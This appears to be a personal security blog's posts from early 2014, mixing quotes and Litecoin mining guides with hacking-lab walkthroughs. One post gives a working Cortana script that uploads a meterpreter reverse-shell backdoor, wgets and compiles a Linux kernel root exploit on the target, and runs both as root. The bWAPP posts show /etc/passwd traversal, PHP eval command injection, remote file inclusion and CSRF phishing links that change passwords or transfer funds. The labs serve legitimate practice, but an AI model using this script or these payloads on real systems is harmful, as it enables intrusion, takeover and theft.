My Quotes

Posted by Security is just an illusion at Friday, March 07, 2014

Always listen to your heart, as it is the messenger of the soul.

For every dark night, there’s a brighter day.

Life’s a wheel of fortune and it’s my chance to spin it.

During your life, never stop dreaming. No one can take away your dreams

We can make the world secure and a safe place to live beside each other, with love.
I would like to get a good job to have a good life.

For the past 20 years, I have looked in the mirror every morning and asked myself: 'If today were the last day of my life, would I want to do what I am about to do today?' And whenever the answer has been 'No' for too many days in a row, I know I need to change something.

Knowledge and perception are the two main doors of the mind.

My mama always used to tell me: If you can’t find somethin’ to live for, you best find somethin’ to die for.

I am trying to find myself. Sometimes that's not easy.

Litecoin Mining OS The "SMOS LTCRabbit Edition" USB stick mining Operating System

Posted by Security is just an illusion at Tuesday, February 04, 2014

 

A friend ask me if i can help him with a Guide to Mine Litecoins.I never mine before puhhh but i learn fast.

Now i found a better way if you want to built a Ltc Mining Rig.

 

 

Short Intro about LiteCoins

Litecoin is a peer-to-peer Internet currency that enables instant payments to anyone in the world. It is based on the Bitcoin protocol but differs from Bitcoin in that it can be efficiently mined with consumer-grade hardware. Litecoin provides faster transaction confirmations (2.5 minutes on average) and uses a memory-hard, scrypt-based mining proof-of-work algorithm to target the regular computers with GPUs most people already have. The Litecoin network is scheduled to produce 84 million currency units.

One of the aims of Litecoin was to provide a mining algorithm that could run at the same time, on the same hardware used to mine Bitcoins. With the rise of specialized ASICs for Bitcoin, Litecoin continues to satisfy these goals. It is unlikely for ASIC mining to be developed for Litecoin until the currency becomes more widely used.

For more information, visit the Litecoin page.

 

What we need to mine LiteCoins.

A Ati/Nvidia Gpu Card or a Cpu with Running OS

Mining Software (GuiMiner) or Standalone OS

LiteCoin Wallet

LiteCoin Pool

 

Nr 1

Get Downloads Here :

Download The LiteCoin Client for your Wallet from https://litecoin.org/

Install Litecoin for your OS and start it and wait for updates, your wallet is now ready.

Nr.2

Join a Pool my choice is ltcrabbit.com

Join the LtcRabbit Pool Here : https://www.ltcrabbit.com/

Make an New Account its very simple.

Add  New Worker “My Account” > My Workers > Add a New Worker

Pool Ready to Mine some ltc coins Well Done.

Worker Ready Now now we need to follow this steps.

 

1. Why should i use "SMOS-LTCRabbit-Edition" USB stick mining operating system?

   LTC mining requires perfect configuration of your graphic card driver, operating system and the miner software cgminer. It is very hard to configure all this and get the maximum hashrate from your graphic cards.
   Therefore, SMOS-Linux.org developed in cooperation with LTCRabbit a mining operating system, which is easy to use and requiring only a minimum of configuration. Just download the operating system, write it to a USB stick, boot your PC from the USB stick, enter you worker username and password (cgminer.conf) and start mining LTC.

 

1. Which hardware is supported
   • Best choice: buy the new AMD R9 280x or older Radeon HD 7950 or HD 7970 (our mining operating system will work out of the box with these cards)
   • Now supported with SMOS LTCRabbit V2: AMD Radeon HD 7990, R9 270X, R9 290X
   • AMD Radeon HD Series 7800, 7700, 7300, 6900, 6800, 6700, 6600, 6550D, 6530D, 6500, 6410D, 6370D, 6310D, 6300, 6200, 5900, 5800, 5700, 5600, 5500, 5400 (find optimal settings for these cards here.)
   • OS supports up to 6 GPUs
   • OS does not support WLAN sticks only ethernet cable
2. Create account.
• Register here, or skip this step if you already have the ltcrabbit account
• Create a worker that will be used by the miner or skip if allready done.
3. Download our LTC mining operating system "SMOS-LTCRabbit-Edition"

1. SMOS-LTCRabbit-Edition-V2 (1 GB)

   • Extract the ZIP file. You'll find the file SMOS-LTCRabbit-Edition-V1.img inside
   • username: root / password: rabbit
   • SMOS-LTCRabbit-Edition is of course free of donation mining!
   • Release notes (30.12.2013)
2. Write the image file to your USB stick (Windows)
   • Download Win32 Disk Imager and extract it
   • Insert your USB stick (minimum size: 2GB, all data will be erased, USB 2.0 or better 3.0)
   • Start Win32 Disk Imager
   • Select "SMOS-LTCRabbit-Edition-V1.img" from your disk as "image file" and select the drive letter of your USB stick as "drive". Click "write" to write the image to your USB stick.
     Note: if your USB drive letter does not show up in Win32 Disk Imager, you have to format your USB stick to allow windows to show it. Press Start - Run - "diskmgmt.msc" to open Windows Disk Management utiliy. Delete all old partitions on your USb stick and format it with NTFS or FAT32. Then your USB stick will show up in Win32 Disk Imager
3. Boot from your USB stick
   • Insert your USB stick containing SMOS-LTCRabbit-Edition
   • Make sure your monitor is connected to your separate AMD Radeon HD graphic card and NOT to your onboard HDMI connector / or onboard graphic card
   • Boot your PC from the USB stick
   • If it does not boot from the USB stick, check the boot order in your BIOS
4. Configure SMOS-LTCRabbit-Edition
   • You should see the desktop now
   • 20 seconds after boot, mining automatically starts. Double click on stop_mining on the desktop after mining has started. Stop_mining script gives no feedback, but it does it's job.
   • Double click on cgminer.conf to open the mining configuration file (see screenshot below)
   
   
   • Replace "yourusername.workername" and "password" with your worker credentials. You find the credentials in your LTCRabbit memberarea, menu "Account" -> "Worker"
   • If you run a Radeon HD 7950, HD 7970 or R9 280x you are done. Everything is configured already. Click on start_mining on the desktop (again, this script does not give any feedback, but it starts mining).
   • If you run annother graphic card, please find the correct settings for you specific card here. You definitely have to find the correct values for:
     intensity (-I) Please lower intensity if you experience problems.
     thread-concurrency
     gpu-thread (-g)
     worksize (-w)
   • If you experience problems, first thing is to disable GPU overclocking by deleting following lines in cgminer.conf:
     "gpu-engine" : "1000",
     "gpu-powertune" : "20",
     "gpu-memclock" : "1250"
5. Watch your mining rig status remotely
   • You can watch your rig mining status through annother PC located in your local network. Open the following URL in your browser:
     http://YourRigIP:8080
     Please replace YourRigIP with the IP address of your mining rig. You can find it in the upper left corner of the desktop (see screenshot above)
   • You can connect to your rig by SSH (Port 222, Username root, Password rabbit):
     Linux: open terminal and enter "ssh root@YourRigIP -p 222"
     Windows: use the SSH client Putty to connect to the rig.
6. Technical details
   • Want to know things like how to set a static IP for your rig or change the start mining delay after boot?
   • Read the SMOS-LTCRabbit-Edition cheat page
7. Release notes
   • SMOS LTCRabbit Edition V1 (22.11.2013): initial release
   • SMOS LTCRabbit Edition V2 (30.12.2013): Catalyst drivers upgraded to 13.11b, ADL upgraded to 6.0, CGMiner upgraded to 3.7.2, improved webinterface. Full R9 and 7990 GPU support. Automatic reconnect of CGMiner is now working correctly.

• Credits: SMOS-LTCRabbit-Edition is based on BAMT, which was further enhanced by SMOS-Linux.org to SMOS, which was adapted to the needs of LTCRabbit by SMOS-Linux.org

Nr.8

Add your payout wallet address from your wallet to ltcrabbit.

Now you need only wait and got $$$ from your vga-cards cool.

 

---------------------------------------------------------------

Nr.9

Info Coming soon frist need some coins to cashout.

Get some LTC Coins and cashout to real $$$.

---------------------------------------------------------------

 

Nr.10

Donate Some Litecoins for the great tut ;)

Donate Send to : LPEVLuHAwSc53otzLLmVnjde2r7wUVTMsZ

 

Have pfun

Income estimation for 2 x AMD ATI XFC HD 5830 1gb DDR5 running 24/7 :
LTC in 24h: 0.32552875
LTC in 7 days: 1.67870124
LTC in 1 month: 6.76586245

LTC > USD 1 > 21~$

 

 

 

Easy Beginner Guide : How to mine LiteCoins @ LtcRabbit

Posted by Security is just an illusion at Sunday, January 26, 2014

 

A friend ask me if i can help him with a Guide to Mine Litecoins.I never mine before puhhh but i learn fast.

Short Intro about LiteCoins

Litecoin is a peer-to-peer Internet currency that enables instant payments to anyone in the world. It is based on the Bitcoin protocol but differs from Bitcoin in that it can be efficiently mined with consumer-grade hardware. Litecoin provides faster transaction confirmations (2.5 minutes on average) and uses a memory-hard, scrypt-based mining proof-of-work algorithm to target the regular computers with GPUs most people already have. The Litecoin network is scheduled to produce 84 million currency units.

One of the aims of Litecoin was to provide a mining algorithm that could run at the same time, on the same hardware used to mine Bitcoins. With the rise of specialized ASICs for Bitcoin, Litecoin continues to satisfy these goals. It is unlikely for ASIC mining to be developed for Litecoin until the currency becomes more widely used.

For more information, visit the Litecoin page.

 

What we need to mine LiteCoins.

A Ati/Nvidia Gpu Card or a Cpu with Running OS

Mining Software (GuiMiner) or Standalone OS

LiteCoin Wallet

LitCoin Pool

 

Nr 1

Get Downloads Here :

Download The LiteCoin Client for your Wallet from https://litecoin.org/

Install Litecoin for your OS and start it and wait for updates, your wallet is now ready.

Nr.2

VERY IMPORTANT ONLY FOR ATI USERS !!!

Many people skip this 2rd step, and they end up having extremely bad results...   So, here we go, with bold letters.
Please ensure you have the following dependencies installed
• AMD APP SDK: http://developer.amd.com/tools/hc/AMDAPPSDK/downloads/Pages/default.aspx
• Latest AMD drivers: http://support.amd.com/us/gpudownload/Pages/index.aspx

or

Known working for all cards AMD driver (12.8):
12.8 32-bit
12.8 64-bit
AVOID 12.10 DRIVERS, THEY SEEM TO BREAK LITECOIN PERFORMANCE. 13.X SEEM TO BE OKAY.

Update your Drivers Install Amd app sdk then one simple reboot.

 

Nr.3

Join a Pool my choice is ltcrabbit.com

Join LtcRabbit Pool Here : https://www.ltcrabbit.com/

Make an New Account its very simple.

Add  New Worker “My Account” > My Workers > Add a New Worker

Pool Ready to Mine some ltc coins Well Done.

 

Nr.4

On A running Windows System we can use CGMiner LTCRabbit V1.

Download CGMiner LTCRabbit V1 fork for mining Litecoins :  Download

Download unpack ánd run test batch > start_mining_ltcrabbit_slot_1.bat

After a short test give it 10 mins you can edit the batch file 1-4 with your worker + pass.

Or Write a Muti Mining batch with conf maybe later.

 

Accepted mean its works ;) and you can change you worker too your own worker.

If you have multi gpus you can test slot_2-4 too.

start_mining_ltcrabbit_slot_1.bat >> use gpu 0

start_mining_ltcrabbit_slot_2.bat >> use gpu 1

start_mining_ltcrabbit_slot_3.bat >> use gpu 2

start_mining_ltcrabbit_slot_4.bat >> use gpu 3

 

And Yes you can run all cards at the same time but only if you got 4 x vga cards or more.

Change your worker name + pass into the batch files with your own.

.\cgminer-3.7.2-windows\cgminer.exe --scrypt -u yourworkeruser.namehere -p yourpasswordhere -o stratum+tcp://eu.ltcrabbit.com:3333 --gpu-platform 0 -d 0 -w 256 -v 1 -I 18 -g 1 -l 1 -T  --thread-concurrency 6144

 

If you run annother graphic card, please find the correct settings for you specific card here. You definitely have to find the correct values for:
intensity (-I) Please lower intensity if you experience problems.
thread-concurrency
gpu-thread (-g)
worksize (-w)

Save it now and close all other miners ,run batch file again.

Be happy with some ltcoins.

 

Nr.5

Add your payout wallet address from your wallet to ltcrabbit.

Now you need only wait and got $$$ from your vga-cards cool.

 

---------------------------------------------------------------

Nr.6

Info Coming soon frist need some coins to cashout.

Get some LTC Coins and cashout to real $$$.

---------------------------------------------------------------

 

Nr.7

Donate Some Litecoins for the great tut ;)

Donate Send to : LPEVLuHAwSc53otzLLmVnjde2r7wUVTMsZ

 

Have pfun

Income estimation for 2 x AMD ATI XFC HD 5830 1gb DDR5 running 24/7 :
LTC in 24h: 0.32552875
LTC in 7 days: 1.67870124
LTC in 1 month: 6.76586245

LTC > USD 1 > 21~$

Auto Rooting Kernel < 2.6.36 Menu for Contana Cobalt Engine v0.1

Posted by Security is just an illusion at Wednesday, January 22, 2014

 

 

Here I wrote some very simple Cortana Auto Rooting Kernel < 2.6.36 Script.

Tested on Hackademic.RTB1 : Demo

 

# Auto Rooting < 2.6.36 Menu for Cobalt Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy 
# from http://security-is-just-an-illusion.blogspot.de
#debug(7);

popup shell {
	if (host_os(session_host($1)) eq "Linux") {
		menu "Auto Rooting" {
			item "Auto Rooting < 2.6.36" {
				println("Auto Rooting");

                                # Generate Payload
                                $r_lport = random_port();
                                $backdoor = generate("linux/x86/meterpreter/reverse_tcp", lhost(), $r_lport, %(), "elf");
                                $handle2 = openf(">/tmp/linux_backdoor_$r_lport");
                                writeb($handle2, $backdoor);
                                closef($handle2);  
                                
                                shell_upload($1, "/tmp/linux_backdoor_$r_lport", "/tmp/linux_backdoor_$r_lport");

                                # Launch our aux shells
                                handler("linux/x86/meterpreter/reverse_tcp", $r_lport, %(LHOST => lhost()));
                                
                                # Rooting
				                s_cmd($1, "wget http://downloads.securityfocus.com/vulnerabilities/exploits/44219.c");
				                s_cmd($1, "gcc 44219.c -o rootme_1");
                                s_cmd($1, "chmod +x rootme_1");
				                s_cmd($1, "chmod 0777 rootme_1");
				                s_cmd($1, "./rootme_1");
                                sleep(10 * 1000);
                                s_cmd($1, "chmod +x /tmp/linux_backdoor_$r_lport");
				                s_cmd($1, "chmod 0777 /tmp/linux_backdoor_$r_lport");
				                s_cmd($1, "chown root:root /tmp/linux_backdoor_$r_lport");
				                s_cmd($1, "/tmp/linux_backdoor_$r_lport");
				                s_cmd($1, "exit");

                                db_sync(); 
  
                                #s_cmd($1, "nc -lvp 31337");
	                            #cmd($console, "use exploit/multi/handler");
	                            #cmd($console, "set LPORT 31337");
                                #$host = session_host($1);
	                            #cmd($console, "set RHOST $host");
	                            #cmd($console, "set PAYLOAD cmd/unix/bind_netcat");
	                            #cmd($console, "set ExitOnSession false");
	                            #cmd($console, "exploit -j");

			}
		}
	}
}
		

 

Have pfun

Four Days with Cortana Script Engine - Cobalt Strike/Armitage

Posted by Security is just an illusion at Wednesday, January 22, 2014

 

I wrote some new simple Cortana Script - menu item - “Web ToolKit - Others”

Brute Http Dirs (dirb)

Searchsploit (searchsploit)

Get Exploit (cat exploit)

Netdiscover (netdiscover)

 

# Others for Cobalt Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy 
# from http://security-is-just-an-illusion.blogspot.de

println("\n----------------------------------------\n\c4[*] Others for Cobalt Engine v0.1 Loaded [*] \n----------------------------------------");

menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Others" {
item "Brute Http Dirs" {

$ip = prompt_text("Enter Http Server IP");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");	

	println("\n----------------------------------------\n\c4[*] Start Bruteforce Http-Server $ip \n----------------------------------------");
	$console = console();
	cmd($console, "xterm -geometry 150x24+0+100 -hold -e dirb $ip &");
        sleep(2 * 1000);
}
}
item "Searchsploit" {

$ip = prompt_text("Enter Search Query");
if
($ip !is $null) {	

	println("\n----------------------------------------\n\c4[*] Search for exsploit : $ip\n----------------------------------------");
	$console = console();
	cmd($console, "xterm -geometry 150x24+0+100 -hold -e searchsploit $ip &");
        sleep(2 * 1000);
}
}
item "Get Exploit" {

$ip = prompt_text("Enter Exploit Path /php/webapps/29894.txt");
if
($ip !is $null) {

	println("\n----------------------------------------\n\c4[*] Get Exsploit : $ip\n----------------------------------------");
	$console = console();
	cmd($console, "gnome-terminal -x cat /usr/share/exploitdb/platforms$ip &");
        sleep(2 * 1000);
}
}
item "Netdiscover" {

$ip = prompt_text("Enter Ip or Range -r");
if
($ip !is $null) {

	println("\n----------------------------------------\n\c4[*] Search New Hosts : $ip\n----------------------------------------");
	$console = console();
	cmd($console, "xterm -geometry 150x24+0+100 -hold -e netdiscover $ip &");
        sleep(2 * 1000);
}
}
}
}

Have pfun and feel free too share or host my scripts.

Hackademic.RTB1 Short Video Solution

Posted by Security is just an illusion at Saturday, January 18, 2014

 

Tools Used :

Kali Sqlmap Armitage Dirb Netdiscover

Mission Accepted

Not much too say atm sry just look the Video Solution.

And yeah i built my own autorooting script for Armitage/Cobalt Strike.

Script Source maybe later >

Video Solution :

Have pfun

Hackademic.RTB1

Posted by Security is just an illusion at Saturday, January 18, 2014

 

Hackademic.RTB

This is the first realistic hackademic challenge (root this box) by mr.pr0n
Download the target and get root.
After all, try to read the contents of the file 'key.txt' in the root directory.
Enjoy!

Source: http://ghostinthelab.wordpress.com/2011/09/06/hackademic-rtb1-root-this-box/

 

Security-Talk.info a Social Network not only for Ethical Hackers

Posted by Security is just an illusion at Wednesday, January 15, 2014

Welcome to Security-Talk a Social Network not only for Ethical Hackers.

 

Feel free to participate in our New Community!

Share your knowledge.

It is a way to achieve immortality !!!

Feature :
Facebook Connect Simple Join Us with Facebook Login
Social Network Utility (Facebook like Community System)
Own Forum Pentest,Video TuTs,Security,Expolits,News,Reverse Engineering much more ++
Ask & Questions Area
Chat/Chat Room for your Friends
Own Blogs for Users (Not the Best But it works)
Own Events
Video Share Support
Picture Upload Support
Share Links with Users
Create own Groups
Crowdfunding your own Projects (Beta Coming Soon)
and much more ++

Share your knowledge.

It is a way to achieve immortality !!!
Let Us Grow its Free !!!

- See more at: http://security-talk.info

- Fell free to add me as Friend @ http://security-talk.info/user/cr4shy

 

 

bWAPP Others Bugs

Posted by Security is just an illusion at Wednesday, January 15, 2014

bWAPP, or a buggy web application, is a deliberately insecure web application.
bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. It prepares to conduct successful penetration testing and ethical hacking projects. It is for educational purposes only.

What makes bWAPP so unique? Well, it has over 60 web bugs!
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!

The OWASP Top 10 provides an accurate snapshot of the current threat landscape in application security and reflects the collaborative efforts and insights of thousands of accomplished security engineers. To reflect the ongoing changes in technology and common online business practices, the list is periodically updated.

You can download bWAPP from here. Have fun!
It's also possible to download our bee-box, a custom Linux VM pre-installed with bWAPP.

bWAPP Other Bugs

Part 1-10 Low

Client-Side Validation (Password)

Directory Traversal - Files

Directory Traversal - Directories

HTTP Response Splitting

Information Disclosure - Headers

Information Disclosure – PHP Version

Information Disclosure - Robots

PHP Eval Function

Remote & Local File Inclusion

Unrestricted File Upload

 

Client-Side Validation (Password)

Maybe later ;)

 

Directory Traversal – Files

Try to climb higher Spidy...

A directory traversal (or path traversal) consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.

The goal of this attack is to order an application to access a computer file that is not intended to be accessible. This attack exploits a lack of security (the software is acting exactly as it is supposed to) as opposed to exploiting a bug in the code.

Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also canonicalization attacks.

 

Example

 

<?php
$template = 'red.php';
if (isset($_COOKIE['TEMPLATE']))
   $template = $_COOKIE['TEMPLATE'];
include ("/home/users/phpguru/templates/" . $template);
?>

An attack against this system could be to send the following HTTP request:

GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd

 

 

climb higher Spidy ;)

Now We can Read Local Files like configs php files and all other good files.

 

Directory Traversal - Directories

Directory Traversal Attack is an attack that allows an attacker to traverse or move through one or more forbidden directories to gain access to restricted files. The attack is possible due to improper validation/configuration by either the programmer or the server itself.

In the context of Web Security, Directory Traversal Attack has two flavors: attacks against web server and attacks against application code.

Web Server Level Directory Traversal Attack

Directory Traversal Attacks targeted towards web servers are not very common these days because most web server vendors have realized the potentials of these attacks and have provided patches to their servers. But since not everybody has the latest web server software and because some do not apply patches promptly, it is still possible to find web servers on the internet that are still vulnerable to such attacks.

Hint : Check the Url

http://192.168.178.1/bWAPP/directory_traversal_2.php?directory=documents

Change Url to any other folder

http://192.168.178.1/bWAPP/directory_traversal_2.php?directory=/etc/
http://192.168.178.1/bWAPP/directory_traversal_2.php?directory=/tmp/
http://192.168.178.1/bWAPP/directory_traversal_2.php?directory=/var/www/

 

Have pfun ;)

 

HTTP Response Splitting

Dont Know ….. Maybe later

 

Information Disclosure – Headers

Information disclosure using HTTP Headers is the initial step for malicious users to gain insight of web platform, tools and technologies in use. With this knowledge attacker may exploit the known vulnerabilities as applicable to respective tools and technologies.

Therefore you should always verify the information you are revealing using HTTP headers and information disclosure should be minimized as much as possible. The following are the key HTTP headers that provide technical details of the web platform in use.

SERVER: Disclose the web server in user e.g. Server:Apache, Server:Microsoft-IIS/7.5
XASP_Net_Version: Disclose the ASP.Net version number configured for your web site e.g. X-AspNet-Version : 4.0.30319
XPoweredBy: Disclose additional information about ASP.Net or other tools in use e.g.
X-Powered-By : W3 Total Cache/0.9.2.4
X-Powered-By : ASP.NET,ASP.NET

 

Tools Used : Tamper Firefox addon

I love Marvel movies too ;)

 

Information Disclosure – PHP Version

Nothing to Say most Vuln ever Public phpinfo();

Well Done ;)

 

Information Disclosure – Robots

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index. The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

 

 

PHP Eval Function

eval () is a PHP function that allows to interpret a given string as PHP code, because eval () is often used in Web applications,
although interpretation of the chain is widely liked manipulated, eval () serves most of the time to execute php code containing previously defined variable.
the problem is that if eval () executes a variable that you can modify the code contained by php eval () will execute as such.
Reminder: eval () allows execution of a given string as PHP code but not write (or if so desired) its content in this page or others, he is content to perform, and display the result.
We will even two different PHP source code using Eval (), the possibilities of PHP code injection and how how to use eval () can change the syntax of PHP code to execute.

 

http://192.168.178.1/bWAPP/php_eval.php?eval=system('cat%20/etc/passwd');

The contents of the passwd file will be displayed in the page render…..

Currently this same string works on all security levels.

 

Remote & Local File Inclusion

 

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file or more serious events such as:

• Code execution on the web server
  
• Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).
  
• Denial of Service (DoS)
  
• Data Theft/Manipulation

 

 

Remote File Inclusion

Upload php code to pastebin or others and change the url

http://192.168.178.1/bWAPP/rlfi.php?language=<Bad Url with PHP code >&action=go

We got it ;) your php code get executed and loaded

Local File Inclusion

Same like Remote but now you can read local files only.

http://192.168.178.1/bWAPP/rlfi.php?language=<Load Local File>&action=go

 

Unrestricted File Upload

Not much to say you can upload any file on low security at higher security you need tamper or other tools to change the format.

Or change the name to something like this goodboy.jpg.php.

 

 

90 % of bWAPP Done the rest maybe later ;)

bWAPP Cross-Site Request Forgery (CSRF)

Posted by Security is just an illusion at Tuesday, January 14, 2014

 

 

bWAPP, or a buggy web application, is a deliberately insecure web application.
bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. It prepares to conduct successful penetration testing and ethical hacking projects. It is for educational purposes only.

What makes bWAPP so unique? Well, it has over 60 web bugs!
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!

The OWASP Top 10 provides an accurate snapshot of the current threat landscape in application security and reflects the collaborative efforts and insights of thousands of accomplished security engineers. To reflect the ongoing changes in technology and common online business practices, the list is periodically updated.

You can download bWAPP from here. Have fun!
It's also possible to download our bee-box, a custom Linux VM pre-installed with bWAPP.

 

Cross-Site Request Forgery (CSRF)

Part 1-3 Low

CSRF (Password)

CSRF (Transfer Amount)

CSRF (Secret)

 

CSRF (Password)

 

 

Here we can change your password.Lets give it a try.

 

 

Here we can see the url

http://192.168.178.22/bWAPP/csrf_1.php?password_new=lol&password_conf=lol&action=change

password_new=lol

password_conf=lol

action=change

 

With some social engineering skill you can trick the user to click your link with the new user password.
After the user click on the link the password changed.

 

Sample :

Cr4shy must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following:

<a href="http://192.168.178.22/bWAPP/csrf_1.php?password_new=lol&password_conf=lol&action=change">Warning Please Read : Dont change your Password!</a>

Alice click on the link and the password changed to lol

 

CSRF (Transfer Amount)

 

 

We got some money to play with it

Amount on your account: 1000 EUR

Account to transfer: 123-45678-90

Maybe Vuln ?

Now we transfers 100 Eur to Alice its work 900 Eur left.But i want more Money hmmm.

 

 

Hmm 900 Eur left suckz ...

Maybe Math can help us

http://192.168.178.22/bWAPP/csrf_2.php?account=123-45678-90&amount=0&action=transfer

account=123-45678-90

amount=0

action=transfer

Whats happen if i add amount=+1.000.000

 

 

Ohhh Nooooo

Amount on your account: -999000 EUR Now only self kill works

No if a + remove money on the acc a - will add money on the acc i hope

 

 

 

Now we can stop working and go live in Freedom and Peace

Amount on your account: 1001000 EUR

I dont need more

 

Vuln : 2

With some social engineering skill you can trick the user to click your link with the Amount  of money to transfers.
After the user click on the link the say good bye too your money.

 

Sample :

Cr4shy must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following:

<a href="http://192.168.178.22/bWAPP/csrf_2.php?account=123-45678-90&amount=1000000&action=transfer">Warning Please Read : You got Hacked please change your Password fast!</a>

Alice click on the link and bye bye to Alice Money

 

CSRF (Secret)

 

 

Maybe Later